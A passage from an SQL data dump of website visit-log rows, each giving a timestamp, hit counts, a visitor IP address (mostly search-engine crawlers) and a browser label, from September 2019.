567877514,1,1,0,0,'91.196.178.182','chrome'),(447755,1567877764,1,1,0,0,'54.201.66.91','other'),(447756,1567877806,1,1,0,0,'176.14.254.133','chrome'),(447757,1567877826,1,1,0,0,'128.72.159.196','chrome'),(447758,1567878063,2,2,0,0,'66.249.66.136','chrome'),(447759,1567878109,1,1,0,0,'54.36.149.42','other'),(447760,1567878251,1,1,0,0,'54.36.149.83','other'),(447761,1567878354,1,1,0,0,'157.55.39.57','other'),(447762,1567878377,1,1,0,0,'13.66.139.0','other'),(447763,1567878520,1,1,0,0,'37.9.113.20','other'),(447764,1567878537,1,1,0,0,'141.8.188.65','other'),(447765,1567878544,1,1,0,0,'157.55.39.168','other'),(447766,1567878580,1,1,0,0,'141.8.188.11','other'),(447767,1567878667,1,1,0,0,'54.36.149.16','other'),(447768,1567879015,1,1,0,0,'91.196.178.26','chrome'),(447769,1567880019,1,1,0,0,'66.249.66.134','chrome'),(447770,1567880989,1,1,0,0,'5.45.207.19','other'),(447771,1567881260,3,3,0,0,'141.8.188.11','other'),(447772,1567881603,3,3,0,0,'141.8.188.29','other'),(447773,1567881724,1,1,0,0,'54.36.149.95','other'),(447774,1567881770,1,1,0,0,'157.55.39.168','other'),(447775,1567882667,2,2,0,0,'104.236.240.178','chrome'),(447776,1567882758,1,1,0,0,'66.249.66.66','chrome'),(447777,1567882891,1,1,0,0,'95.213.184.236','chrome'),(447778,1567883198,1,1,0,0,'95.108.213.50','other'),(447779,1567883215,1,1,0,0,'141.8.188.29','other'),(447780,1567884272,2,2,0,0,'157.55.39.82','other'),(447781,1567884324,1,1,0,0,'178.154.171.17','other'),(447782,1567884327,1,1,0,0,'95.108.181.96','other'),(447783,1567884372,1,1,0,0,'178.154.171.27','other'),(447784,1567884472,1,1,0,0,'37.9.113.20','other'),(447785,1567884498,1,1,0,0,'5.255.253.38','other'),(447786,1567884844,1,1,0,0,'77.111.247.180','chrome'),(447787,1567885034,1,1,0,0,'54.36.149.23','other'),(447788,1567885254,2,2,0,0,'40.77.167.142','other'),(447789,1567885447,1,1,0,0,'8.29.198.25','other'),(447790,1567886355,1,1,0,0,'8.29.198.25','other'),(447791,1567886671,1,1,0,0,'95.108.213.4','other'),(447792,1567887213,2,2,0,0,'66.249.66.138','chrome'),(447793,1567887512,1,1,0,0,'188.163.28.33','chrome'),(447794,1567887544,1,1,0,0,'54.36.149.37','other'),(447795,1567887547,1,1,0,0,'157.55.39.82','other'),(447796,1567887592,1,1,0,0,'54.36.149.77','other'),(447797,1567888089,3,3,0,0,'66.249.66.134','chrome'),(447798,1567888166,1,1,0,0,'207.46.13.119','other'),(447799,1567888400,1,1,0,0,'66.249.66.138','chrome'),(447800,1567888557,2,2,0,0,'66.249.66.136','chrome'),(447801,1567888763,1,1,0,0,'54.36.149.95','other'),(447802,1567889328,2,2,0,0,'69.58.178.57','other'),(447803,1567889340,1,1,0,0,'5.45.207.79','other'),(447804,1567889468,1,1,0,0,'66.249.66.66','chrome'),(447805,1567889740,1,1,0,0,'141.8.188.11','other'),(447806,1567889810,1,1,0,0,'54.36.149.10','other'),(447807,1567890356,1,1,0,0,'66.249.66.138','chrome'),(447808,1567890415,1,1,0,0,'66.249.66.136','chrome'),(447809,1567891200,1,1,0,0,'40.77.167.196','other'),(447810,1567891300,2,2,0,0,'40.77.167.142','other'),(447811,1567891886,1,1,0,0,'66.249.66.136','chrome'),(447812,1567892674,1,1,0,0,'54.36.149.2','other'),(447813,1567892762,1,1,0,0,'54.36.149.32','other'),(447814,1567892852,1,1,0,0,'207.46.13.119','other'),(447815,1567893087,1,1,0,0,'157.55.39.82','other'),(447816,1567893742,1,1,0,0,'54.36.149.37','other'),(447817,1567894281,1,1,0,0,'66.249.66.138','chrome'),(447818,1567894587,2,2,0,0,'66.249.66.68','chrome'),(447819,1567895592,3,3,0,0,'66.249.66.136','chrome'),(447820,1567895599,1,1,0,0,'141.8.188.29','other'),(447821,1567895856,1,1,0,0,'157.55.39.82','other'),(447822,1567895981,1,1,0,0,'40.77.167.142','other'),(447823,1567896074,2,2,0,0,'207.46.13.119','other'),(447824,1567896316,1,1,0,0,'8.29.198.27','other'),(447825,1567896671,1,1,0,0,'104.130.231.93','chrome'),(447826,1567896692,1,1,0,0,'54.36.149.3','other'),(447827,1567896792,1,1,0,0,'54.36.149.19','other'),(447828,1567896937,1,1,0,0,'141.8.188.11','other'),(447829,1567897117,1,1,0,0,'157.55.39.82','other'),(447830,1567897134,1,1,0,0,'66.249.66.68','chrome'),(447831,1567897190,1,1,0,0,'8.29.198.26','other'),(447832,1567898160,2,2,0,0,'40.77.167.196','other'),(447833,1567898365,7,7,0,0,'34.68.129.146','firefox'),(447834,1567898499,1,1,0,0,'66.249.66.66','chrome'),(447835,1567898623,3,3,0,0,'66.249.66.134','chrome'),(447836,1567898660,1,1,0,0,'66.249.66.136','chrome'),(447837,1567898883,1,1,0,0,'54.36.149.74','other'),(447838,1567899074,1,1,0,0,'193.106.30.99','chrome'),(447839,1567899295,1,1,0,0,'66.249.66.68','chrome'),(447840,1567899334,1,1,0,0,'157.55.39.82','other'),(447841,1567899702,2,2,0,0,'66.249.66.138','chrome'),(447842,1567899762,3,3,0,0,'66.249.66.134','chrome'),(447843,1567899867,2,2,0,0,'207.46.13.119','other'),(447844,1567900160,3,3,0,0,'66.249.66.136','chrome'),(447845,1567900185,3,3,0,0,'35.188.56.224','chrome'),(447846,1567900382,3,3,0,0,'35.239.9.171','chrome'),(447847,1567900398,3,3,0,0,'104.198.72.154','chrome'),(447848,1567900500,3,3,0,0,'35.188.24.84','chrome'),(447849,1567900562,3,3,0,0,'35.225.49.238','chrome'),(447850,1567900591,3,3,0,0,'35.232.75.109','chrome'),(447851,1567900994,1,1,0,0,'66.249.66.138','chrome'),(447852,1567901009,1,1,0,0,'141.8.188.29','other'),(447853,1567901087,1,1,0,0,'66.249.66.68','chrome'),(447854,1567901569,1,1,0,0,'95.108.213.4','other'),(447855,1567901761,1,1,0,0,'5.45.207.19','other'),(447856,1567902857,1,1,0,0,'157.55.39.194','other'),(447857,1567902918,1,1,0,0,'141.8.188.29','other'),(447858,1567903059,1,1,0,0,'66.249.66.134','chrome'),(447859,1567903516,1,1,0,0,'66.249.66.138','chrome'),(447860,1567903790,1,1,0,0,'141.8.188.11','other'),(447861,1567904165,1,1,0,0,'157.55.39.82','other'),(447862,1567904282,1,1,0,0,'66.249.66.136','chrome'),(447863,1567904625,1,1,0,0,'157.55.39.194','other'),(447864,1567905717,1,1,0,0,'13.66.139.0','other'),(447865,1567905726,1,1,0,0,'207.46.13.119','other'),(447866,1567905976,1,1,0,0,'141.8.188.29','other'),(447867,1567906268,1,1,0,0,'66.249.66.64','chrome'),(447868,1567906665,1,1,0,0,'54.36.149.43','other'),(447869,1567906891,1,1,0,0,'141.8.188.11','other'),(447870,1567906928,1,1,0,0,'141.8.188.29','other'),(447871,1567907179,1,1,0,0,'8.29.198.25','other'),(447872,1567907615,1,1,0,0,'54.36.149.105','other'),(447873,1567908038,1,1,0,0,'8.29.198.26','other'),(447874,1567908156,1,1,0,0,'54.36.149.103','other'),(447875,1567908475,2,2,0,0,'66.249.66.138','chrome'),(447876,1567908546,1,1,0,0,'54.36.149.17','other'),(447877,1567908628,1,1,0,0,'54.36.149.86','other'),(447878,1567908723,1,1,0,0,'207.46.13.119','other'),(447879,1567909079,1,1,0,0,'54.36.149.23','other'),(447880,1567909195,1,1,0,0,'54.36.149.105','other'),(447881,1567909205,1,1,0,0,'54.36.149.40','other'),(447882,1567909687,1,1,0,0,'207.46.13.58','other'),(447883,1567909845,1,1,0,0,'66.249.66.138','chrome'),(447884,1567909931,2,2,0,0,'66.249.66.66','chrome'),(447885,1567910046,1,1,0,0,'207.46.13.119','other'),(447886,1567910294,1,1,0,0,'66.249.66.68','chrome'),(447887,1567910719,1,1,0,0,'87.250.224.107','other'),(447888,1567910818,1,1,0,0,'66.249.66.134','chrome'),(447889,1567910891,1,1,0,0,'37.9.113.20','other'),(447890,1567911525,1,1,0,0,'66.249.66.136','chrome'),(447891,1567912550,1,1,0,0,'157.55.39.82','other'),(447892,1567913309,1,1,0,0,'95.108.213.50','other'),(447893,1567914248,1,1,0,0,'66.249.66.66','chrome'),(447894,1567914424,2,2,0,0,'66.249.66.136','chrome'),(447895,1567914992,1,1,0,0,'66.249.66.64','chrome'),(447896,1567916246,1,1,0,0,'66.249.66.136','chrome'),(447897,1567916979,1,1,0,0,'54.36.149.72','other'),(447898,1567917066,1,1,0,0,'66.249.66.138','chrome'),(447899,1567917326,1,1,0,0,'54.36.149.61','other'),(447900,1567917453,1,1,0,0,'40.77.167.122','other'),(447901,1567917558,1,1,0,0,'82.145.208.77','other'),(447902,1567917756,1,1,0,0,'157.55.39.140','other'),(447903,1567918031,1,1,0,0,'8.29.198.27','other'),(447904,1567918038,1,1,0,0,'62.205.134.182','other'),(447905,1567918545,1,1,0,0,'66.249.66.134','chrome'),(447906,1567918712,1,1,0,0,'66.249.66.136','chrome'),(447907,1567918733,1,1,0,0,'66.249.66.68','chrome'),(447908,1567918868,1,1,0,0,'8.29.198.25','other'),(447909,1567919703,1,1,0,0,'54.36.149.15','other'),(447910,1567920054,2,2,0,0,'66.249.66.134','chrome'),(447911,1567920138,1,1,0,0,'141.8.188.11','other'),(447912,1567920597,1,1,0,0,'54.36.149.0','other'),(447913,1567920927,1,1,0,0,'91.196.178.129','firefox'),(447914,1567921117,1,1,0,0,'178.154.171.17','other'),(447915,1567921419,1,1,0,0,'66.249.66.68','chrome'),(447916,1567921849,1,1,0,0,'66.249.66.64','chrome'),(447917,1567922358,1,1,0,0,'141.8.188.29','other'),(447918,1567922454,1,1,0,0,'178.154.171.27','other'),(447919,1567922919,1,1,0,0,'66.249.66.68','chrome'),(447920,1567924158,3,3,0,0,'66.249.66.136','chrome'),(447921,1567924397,1,1,0,0,'40.77.167.136','other'),(447922,1567924571,1,1,0,0,'141.8.188.11','other'),(447923,1567924743,1,1,0,0,'207.46.13.247','other'),(447924,1567925038,2,2,0,0,'141.8.188.29','other'),(447925,1567925644,1,1,0,0,'207.46.13.58','other'),(447926,1567926678,1,1,0,0,'54.36.149.85','other'),(447927,1567926707,1,1,0,0,'141.8.188.29','other'),(447928,1567927185,1,1,0,0,'176.117.174.188','other'),(447929,1567927255,1,1,0,0,'66.249.66.134','chrome'),(447930,1567927471,1,1,0,0,'141.8.188.11','other'),(447931,1567927639,1,1,0,0,'54.36.149.6','other'),(447932,1567927719,4,4,0,0,'88.99.2.203','other'),(447933,1567927732,1,1,0,0,'66.249.66.138','chrome'),(447934,1567928147,1,1,0,0,'54.36.149.28','other'),(447935,1567928174,1,1,0,0,'157.55.39.75','other'),(447936,1567928179,2,2,0,0,'157.55.39.140','other'),(447937,1567928183,1,1,0,0,'207.46.13.247','other'),(447938,1567928188,1,1,0,0,'40.77.167.136','other'),(447939,1567928252,1,1,0,0,'141.8.188.29','other'),(447940,1567928688,1,1,0,0,'88.99.2.203','other'),(447941,1567928703,1,1,0,0,'66.249.66.136','chrome'),(447942,1567928865,1,1,0,0,'54.36.149.46','other'),(447943,1567928874,1,1,0,0,'141.8.142.103','other'),(447944,1567928886,1,1,0,0,'8.29.198.25','other'),(447945,1567929113,1,1,0,0,'66.249.66.138','chrome'),(447946,1567929424,1,1,0,0,'34.255.3.121','chrome'),(447947,1567929589,1,1,0,0,'88.99.2.203','other'),(447948,1567929694,1,1,0,0,'8.29.198.26','other'),(447949,1567929777,1,1,0,0,'207.46.13.43','other'),(447950,1567930279,1,1,0,0,'54.36.149.38','other'),(447951,1567930548,1,1,0,0,'88.99.2.203','other'),(447952,1567930550,1,1,0,0,'66.249.66.136','chrome'),(447953,1567932646,2,2,0,0,'66.249.66.136','chrome'),(447954,1567933799,1,1,0,0,'207.46.13.247','other'),(447955,1567934075,1,1,0,0,'141.8.188.29','other'),(447956,1567934122,1,1,0,0,'46.211.74.177','chrome'),(447957,1567935052,1,1,0,0,'54.36.149.73','other'),(447958,1567936128,1,1,0,0,'54.36.149.37','other'),(447959,1567936149,1,1,0,0,'207.46.13.247','other'),(447960,1567936357,1,1,0,0,'141.8.142.103','other'),(447961,1567936435,1,1,0,0,'13.66.139.0','other'),(447962,1567938101,1,1,0,0,'40.77.167.9','other'),(447963,1567938376,1,1,0,0,'58.250.125.86','other'),(447964,1567938480,1,1,0,0,'5.45.207.79','other'),(447965,1567939665,1,1,0,0,'95.108.213.4','other'),(447966,1567939737,2,2,0,0,'8.29.198.26','other'),(447967,1567940311,1,1,0,0,'213.180.203.17','other'),(447968,1567940328,1,1,0,0,'54.36.149.19','other'),(447969,1567940482,1,1,0,0,'109.74.154.72','chrome'),(447970,1567941668,1,1,0,0,'157.55.39.240','other'),(447971,1567942968,1,1,0,0,'141.8.188.29','other'),(447972,1567943037,1,1,0,0,'54.36.149.63','other'),(447973,1567943529,3,3,0,0,'35.239.6.250','chrome'),(447974,1567943597,3,3,0,0,'35.222.175.255','chrome'),(447975,1567943605,1,1,0,0,'54.36.149.97','other'),(447976,1567943650,3,3,0,0,'104.154.253.38','chrome'),(447977,1567943665,3,3,0,0,'34.67.208.47','chrome'),(447978,1567943687,3,3,0,0,'104.197.241.244','chrome'),(447979,1567943705,3,3,0,0,'34.66.40.239','chrome'),(447980,1567943745,2,2,0,0,'207.46.13.43','other'),(447981,1567943750,1,1,0,0,'207.46.13.97','other'),(447982,1567943755,1,1,0,0,'157.55.39.240','other'),(447983,1567943760,2,2,0,0,'157.55.39.46','other'),(447984,1567943963,1,1,0,0,'54.36.149.34','other'),(447985,1567945636,1,1,0,0,'157.55.39.240','other'),(447986,1567945943,1,1,0,0,'54.36.149.42','other'),(447987,1567947045,1,1,0,0,'66.249.66.136','chrome'),(447988,1567947440,1,1,0,0,'157.55.39.46','other'),(447989,1567947444,1,1,0,0,'207.46.13.97','other'),(447990,1567948248,1,1,0,0,'66.249.66.136','chrome'),(447991,1567949272,1,1,0,0,'66.249.66.136','chrome'),(447992,1567949299,1,1,0,0,'141.8.188.29','other'),(447993,1567950335,1,1,0,0,'66.249.66.68','chrome'),(447994,1567950598,1,1,0,0,'8.29.198.26','other'),(447995,1567951265,1,1,0,0,'54.36.149.56','other'),(447996,1567951303,1,1,0,0,'176.110.134.2','chrome'),(447997,1567951370,1,1,0,0,'8.29.198.25','other'),(447998,1567951639,1,1,0,0,'37.9.113.20','other'),(447999,1567951799,1,1,0,0,'66.249.66.134','chrome'),(448000,1567952461,2,2,0,0,'157.55.39.240','other'),(448001,1567952630,1,1,0,0,'80.95.44.9','chrome'),(448002,1567952708,1,1,0,0,'193.106.30.99','chrome'),(448003,1567953524,1,1,0,0,'157.55.39.46','other'),(448004,1567953682,2,2,0,0,'40.77.167.170','other'),(448005,1567954040,1,1,0,0,'5.255.253.22','other'),(448006,1567954049,1,1,0,0,'141.8.142.103','other'),(448007,1567954053,1,1,0,0,'37.9.113.20','other'),(448008,1567954613,1,1,0,0,'51.255.65.46','other'),(448009,1567954731,1,1,0,0,'207.46.13.97','other'),(448010,1567954937,1,1,0,0,'138.246.253.5','chrome'),(448011,1567956387,1,1,0,0,'40.77.167.170','other'),(448012,1567956859,2,2,0,0,'66.249.66.136','chrome'),(448013,1567957378,1,1,0,0,'66.249.66.138','chrome'),(448014,1567958006,2,2,0,0,'66.249.66.134','chrome'),(448015,1567959043,1,1,0,0,'157.55.39.240','other'),(448016,1567959103,1,1,0,0,'178.154.171.30','other'),(448017,1567959373,1,1,0,0,'93.159.230.28','chrome'),(448018,1567959970,2,2,0,0,'40.77.167.20','other'),(448019,1567960712,1,1,0,0,'5.45.207.19','other'),(448020,1567960828,1,1,0,0,'213.180.203.40','other'),(448021,1567961449,2,2,0,0,'8.29.198.26','other'),(448022,1567961627,1,1,0,0,'157.55.39.244','other'),(448023,1567962020,1,1,0,0,'157.55.39.46','other'),(448024,1567962330,1,1,0,0,'40.77.167.170','other'),(448025,1567963991,1,1,0,0,'40.77.167.170','other'),(448026,1567964020,1,1,0,0,'66.249.66.138','chrome'),(448027,1567965571,1,1,0,0,'141.8.188.29','other'),(448028,1567966058,1,1,0,0,'91.196.178.164','chrome'),(448029,1567966064,1,1,0,0,'87.250.224.47','other'),(448030,1567966474,1,1,0,0,'66.249.66.138','chrome'),(448031,1567968426,2,2,0,0,'141.8.188.11','other'),(448032,1567968472,1,1,0,0,'141.8.188.29','other'),(448033,1567969864,2,2,0,0,'157.55.39.244','other'),(448034,1567970128,1,1,0,0,'147.135.252.34','msie'),(448035,1567970143,1,1,0,0,'66.249.66.136','chrome'),(448036,1567970312,1,1,0,0,'66.249.66.134','chrome'),(448037,1567970924,1,1,0,0,'87.250.224.47','other'),(448038,1567970950,1,1,0,0,'141.8.188.29','other'),(448039,1567970971,1,1,0,0,'157.55.39.244','other'),(448040,1567972071,1,1,0,0,'66.249.66.66','chrome'),(448041,1567972306,2,2,0,0,'8.29.198.25','other'),(448042,1567972745,1,1,0,0,'40.77.167.20','other'),(448043,1567972846,1,1,0,0,'207.46.13.145','other'),(448044,1567972861,1,1,0,0,'188.32.254.169','msie'),(448045,1567973310,1,1,0,0,'213.180.203.17','other'),(448046,1567973642,1,1,0,0,'141.8.188.11','other'),(448047,1567974899,1,1,0,0,'141.8.188.11','other'),(448048,1567975624,1,1,0,0,'141.8.188.29','other'),(448049,1567975628,1,1,0,0,'5.45.207.19','other'),(448050,1567976111,2,2,0,0,'40.77.167.54','other'),(448051,1567976264,1,1,0,0,'128.71.38.35','chrome'),(448052,1567976966,1,1,0,0,'66.249.66.138','chrome'),(448053,1567977043,2,2,0,0,'40.77.167.54','other'),(448054,1567977339,1,1,0,0,'141.8.188.29','other'),(448055,1567977372,1,1,0,0,'141.8.188.11','other'),(448056,1567978058,1,1,0,0,'66.249.66.68','chrome'),(448057,1567978260,1,1,0,0,'40.77.167.54','other'),(448058,1567978534,1,1,0,0,'66.249.66.138','chrome'),(448059,1567978957,1,1,0,0,'66.249.66.136','chrome'),(448060,1567980030,4,4,0,0,'66.249.66.136','chrome'),(448061,1567980329,2,2,0,0,'66.249.66.64','chrome'),(448062,1567980344,1,1,0,0,'66.249.66.66','chrome'),(448063,1567980569,1,1,0,0,'40.77.167.54','other'),(448064,1567980648,1,1,0,0,'207.46.13.204','other'),(448065,1567980721,1,1,0,0,'141.8.188.29','other'),(448066,1567981146,1,1,0,0,'193.106.30.99','chrome'),(448067,1567981287,1,1,0,0,'5.255.253.25','other'),(448068,1567981707,2,2,0,0,'66.249.66.138','chrome'),(448069,1567982418,1,1,0,0,'141.8.188.11','other'),(448070,1567982597,1,1,0,0,'157.55.39.244','other'),(448071,1567983154,1,1,0,0,'8.29.198.26','other'),(448072,1567983906,1,1,0,0,'8.29.198.25','other'),(448073,1567984058,1,1,0,0,'40.77.167.216','other'),(448074,1567984101,1,1,0,0,'141.8.188.29','other'),(448075,1567984310,1,1,0,0,'5.45.207.80','other'),(448076,1567984602,1,1,0,0,'213.180.203.61','other'),(448077,1567985357,1,1,0,0,'66.249.66.66','chrome'),(448078,1567985383,1,1,0,0,'157.55.39.244','other'),(448079,1567985530,1,1,0,0,'66.249.66.138','chrome'),(448080,1567986858,3,3,0,0,'35.224.232.221','chrome'),(448081,1567986869,2,2,0,0,'34.66.4.240','chrome'),(448083,1567986886,3,3,0,0,'146.148.96.72','chrome'),(448084,1567986904,3,3,0,0,'35.222.162.20','chrome'),(448085,1567987061,1,1,0,0,'5.45.207.19','other'),(448086,1567987635,1,1,0,0,'66.249.66.138','chrome'),(448087,1567987956,1,1,0,0,'66.249.66.64','chrome'),(448088,1567987993,3,3,0,0,'66.249.66.134','chrome'),(448089,1567988019,1,1,0,0,'66.249.66.136','chrome'),(448090,1567988455,1,1,0,0,'40.77.167.216','other'),(448091,1567989532,1,1,0,0,'66.249.66.136','chrome'),(448092,1567990489,1,1,0,0,'207.46.13.204','other'),(448093,1567990663,1,1,0,0,'66.249.66.136','chrome'),(448094,1567990901,1,1,0,0,'66.249.66.138','chrome'),(448095,1567994007,2,2,0,0,'8.29.198.26','other'),(448096,1567994325,2,2,0,0,'207.46.13.204','other'),(448097,1567995427,1,1,0,0,'207.46.13.58','other'),(448098,1567997854,1,1,0,0,'207.46.13.58','other'),(448099,1567998876,3,3,0,0,'103.125.234.202','other'),(448100,1568001854,1,1,0,0,'213.180.203.9','other'),(448101,1568001915,1,1,0,0,'87.250.224.81','other'),(448102,1568001961,1,1,0,0,'157.55.39.225','other'),(448103,1568002472,1,1,0,0,'87.250.224.107','other'),(448104,1568002732,1,1,0,0,'167.71.162.130','other'),(448105,1568002749,1,0,1,0,'66.249.66.138',''),(448106,1568002779,1,1,0,0,'66.249.66.134','chrome'),(448107,1568003015,1,1,0,0,'157.55.39.90','other'),(448108,1568003365,1,1,0,0,'157.55.39.225','other'),(448109,1568004385,1,1,0,0,'62.205.134.182','other'),(448110,1568004815,1,1,0,0,'141.8.188.29','other'),(448111,1568004863,1,1,0,0,'8.29.198.26','other'),(448112,1568005470,1,1,0,0,'178.154.171.47','other'),(448113,1568005482,1,1,0,0,'37.9.113.148','other'),(448114,1568005579,1,1,0,0,'8.29.198.25','other'),(448115,1568005840,1,1,0,0,'31.13.127.16','other'),(448116,1568006079,1,1,0,0,'66.249.66.64','chrome'),(448117,1568006086,1,1,0,0,'66.249.66.136','chrome'),(448118,1568006346,1,1,0,0,'40.77.167.154','other'),(448119,1568007410,2,2,0,0,'157.55.39.241','other'),(448120,1568007472,1,1,0,0,'91.124.181.19','chrome'),(448121,1568008454,1,1,0,0,'207.46.13.213','other'),(448122,1568008814,1,1,0,0,'91.196.178.73','chrome'),(448123,1568008962,1,1,0,0,'40.77.167.154','other'),(448124,1568009220,1,1,0,0,'141.8.188.11','other'),(448125,1568009530,2,2,0,0,'91.196.178.93','chrome'),(448126,1568010827,1,1,0,0,'141.8.142.162','other'),(448127,1568011121,1,1,0,0,'87.250.224.64','other'),(448128,1568011183,1,1,0,0,'157.55.39.241','other'),(448129,1568011381,1,1,0,0,'66.249.66.136','chrome'),(448130,1568011417,1,1,0,0,'91.196.178.33','chrome'),(448131,1568012661,1,1,0,0,'207.46.13.213','other'),(448132,1568013009,1,1,0,0,'91.196.178.93','chrome'),(448133,1568013646,1,1,0,0,'91.196.179.134','chrome'),(448134,1568014003,1,1,0,0,'157.55.39.241','other'),(448135,1568014008,1,1,0,0,'40.77.167.68','other'),(448136,1568014013,1,1,0,0,'40.77.167.8','other'),(448137,1568014017,2,2,0,0,'207.46.13.213','other'),(448138,1568014161,1,1,0,0,'141.8.142.162','other'),(448139,1568014368,1,1,0,0,'213.180.203.48','other'),(448140,1568015716,2,2,0,0,'8.29.198.25','other'),(448141,1568015892,1,1,0,0,'37.9.113.20','other'),(448142,1568016180,1,1,0,0,'207.46.13.66','other'),(448143,1568016591,2,2,0,0,'40.77.167.68','other'),(448144,1568016775,1,1,0,0,'157.55.39.241','other'),(448145,1568018111,1,1,0,0,'178.154.171.17','other'),(448146,1568019559,1,1,0,0,'141.8.188.11','other'),(448147,1568019607,1,1,0,0,'207.46.13.66','other'),(448148,1568019772,1,1,0,0,'66.249.66.134','chrome'),(448149,1568020849,1,1,0,0,'157.55.39.241','other'),(448150,1568020874,1,1,0,0,'40.77.167.68','other'),(448151,1568020915,1,1,0,0,'195.114.146.165','chrome'),(448152,1568021045,1,1,0,0,'66.249.66.68','chrome'),(448153,1568022429,1,1,0,0,'40.77.167.68','other'),(448154,1568022892,1,1,0,0,'173.252.95.35','chrome'),(448155,1568023421,1,1,0,0,'5.255.253.25','other'),(448156,1568023839,1,1,0,0,'91.196.178.169','chrome'),(448157,1568024192,1,1,0,0,'157.55.39.241','other'),(448158,1568025287,1,1,0,0,'46.211.122.60','chrome'),(448159,1568025840,1,1,0,0,'66.249.66.64','chrome'),(448160,1568026561,1,1,0,0,'8.29.198.25','other'),(448161,1568026627,1,1,0,0,'178.154.200.48','other'),(448162,1568027014,1,1,0,0,'109.74.154.72','chrome'),(448163,1568027261,1,1,0,0,'8.29.198.26','other'),(448164,1568029038,1,1,0,0,'107.178.238.124','firefox'),(448165,1568029416,1,1,0,0,'207.46.13.51','other'),(448166,1568029470,1,1,0,0,'95.108.213.4','other'),(448167,1568030279,2,2,0,0,'104.198.177.32','chrome'),(448168,1568030321,3,3,0,0,'35.225.151.111','chrome'),(448169,1568030335,5,5,0,0,'130.211.204.66','chrome'),(448170,1568030357,1,1,0,0,'34.66.93.231','chrome'),(448171,1568030358,2,2,0,0,'34.66.93.231','chrome'),(448172,1568030374,3,3,0,0,'104.197.164.52','chrome'),(448173,1568030975,1,1,0,0,'207.46.13.36','other'),(448174,1568031053,1,1,0,0,'141.8.188.21','other'),(448175,1568031126,1,1,0,0,'178.154.171.47','other'),(448176,1568031162,1,1,0,0,'178.154.171.30','other'),(448177,1568031235,1,1,0,0,'178.154.200.48','other'),(448178,1568031694,1,1,0,0,'91.196.178.93','chrome'),(448179,1568032379,1,1,0,0,'157.55.39.224','other'),(448180,1568032500,1,1,0,0,'37.9.113.148','other'),(448181,1568032505,1,1,0,0,'213.180.203.9','other'),(448182,1568032738,1,1,0,0,'157.55.39.111','other'),(448183,1568032973,1,1,0,0,'40.77.167.175','other'),(448184,1568032977,1,1,0,0,'207.46.13.51','other'),(448185,1568033071,1,1,0,0,'37.52.20.95','chrome'),(448186,1568033357,1,1,0,0,'157.55.39.224','other'),(448187,1568033865,1,1,0,0,'77.37.130.144','chrome'),(448188,1568034194,2,2,0,0,'91.196.178.40','chrome'),(448189,1568035121,1,1,0,0,'207.46.13.51','other'),(448190,1568035327,1,1,0,0,'31.13.127.6','other'),(448191,1568035879,1,1,0,0,'157.55.39.111','other'),(448192,1568036183,1,1,0,0,'40.77.167.175','other'),(448193,1568036408,1,1,0,0,'37.9.113.20','other'),(448194,1568037408,1,1,0,0,'8.29.198.25','other'),(448195,1568037615,50,50,0,0,'133.18.205.56','chrome'),(448196,1568037679,2,2,0,0,'91.196.177.46','chrome'),(448197,1568037974,1,1,0,0,'66.249.66.136','chrome'),(448198,1568037982,1,1,0,0,'66.249.66.66','chrome'),(448199,1568038161,1,1,0,0,'8.29.198.26','other'),(448200,1568038187,1,1,0,0,'66.249.66.138','chrome'),(448201,1568038275,1,1,0,0,'157.55.39.111','other'),(448202,1568038280,2,2,0,0,'207.46.13.51','other'),(448203,1568038285,4,4,0,0,'157.55.39.224','other'),(448204,1568038529,30,30,0,0,'133.18.205.56','chrome'),(448205,1568038566,1,1,0,0,'40.77.167.108','other'),(448206,1568038681,1,1,0,0,'141.8.188.11','other'),(448207,1568040901,1,1,0,0,'37.9.113.20','other'),(448208,1568041951,1,1,0,0,'46.243.149.194','chrome'),(448209,1568041982,1,1,0,0,'5.45.207.79','other'),(448210,1568042095,1,1,0,0,'141.8.188.29','other'),(448211,1568044138,1,1,0,0,'141.8.142.103','other'),(448212,1568044553,1,1,0,0,'207.46.13.51','other'),(448213,1568046511,1,1,0,0,'91.196.178.184','chrome'),(448214,1568046823,1,1,0,0,'157.55.39.111','other'),(448215,1568047724,1,1,0,0,'5.45.207.79','other'),(448216,1568047767,1,1,0,0,'141.8.188.29','other'),(448217,1568048241,2,2,0,0,'66.249.66.138','chrome'),(448218,1568048255,2,2,0,0,'66.249.66.64','chrome'),(448219,1568048282,2,2,0,0,'8.29.198.27','other'),(448220,1568048539,2,2,0,0,'66.249.66.134','chrome'),(448221,1568050010,1,1,0,0,'66.249.66.136','chrome'),(448222,1568050192,1,1,0,0,'66.249.66.138','chrome'),(448223,1568051058,1,1,0,0,'66.249.66.64','chrome'),(448224,1568051326,1,1,0,0,'66.249.66.134','chrome'),(448225,1568052583,1,1,0,0,'141.8.188.11','other'),(448226,1568053550,1,1,0,0,'66.249.66.134','chrome'),(448227,1568053583,2,2,0,0,'66.249.66.136','chrome'),(448228,1568053952,1,1,0,0,'5.45.207.19','other'),(448229,1568054064,1,1,0,0,'40.77.167.116','other'),(448230,1568054751,1,1,0,0,'91.196.178.47','chrome'),(448231,1568055251,1,1,0,0,'87.250.224.64','other'),(448232,1568055273,2,2,0,0,'66.249.66.138','chrome'),(448233,1568055382,1,1,0,0,'213.180.203.48','other'),(448234,1568055731,1,1,0,0,'40.77.167.147','other'),(448235,1568056435,1,1,0,0,'13.66.139.0','other'),(448236,1568056894,2,2,0,0,'66.249.66.136','chrome'),(448237,1568057324,1,1,0,0,'141.8.188.29','other'),(448238,1568057361,1,1,0,0,'40.77.167.195','other'),(448239,1568058509,1,1,0,0,'66.249.66.68','chrome'),(448240,1568059009,1,1,0,0,'87.250.224.47','other'),(448241,1568059030,1,1,0,0,'141.8.188.11','other'),(448242,1568059036,2,2,0,0,'66.249.66.136','chrome'),(448243,1568059134,1,1,0,0,'8.29.198.26','other'),(448244,1568059354,1,1,0,0,'40.77.167.147','other'),(448245,1568059649,2,2,0,0,'95.213.141.126','opera'),(448246,1568059890,1,1,0,0,'8.29.198.27','other'),(448247,1568060240,1,1,0,0,'5.45.207.79','other'),(448248,1568060661,1,1,0,0,'157.55.39.69','other'),(448249,1568061112,1,1,0,0,'66.249.66.138','chrome'),(448250,1568061321,1,1,0,0,'66.249.66.66','chrome'),(448251,1568061525,1,1,0,0,'141.8.188.11','other'),(448252,1568061552,1,1,0,0,'91.209.11.236','other'),(448253,1568062216,1,1,0,0,'66.249.66.136','chrome'),(448254,1568062680,1,1,0,0,'89.35.29.38','firefox'),(448255,1568062796,2,2,0,0,'40.77.167.116','other'),(448256,1568063568,1,1,0,0,'40.77.167.162','other'),(448257,1568063950,1,1,0,0,'157.55.39.212','other'),(448258,1568064446,2,2,0,0,'66.249.66.138','chrome'),(448259,1568064933,1,1,0,0,'157.55.39.212','other'),(448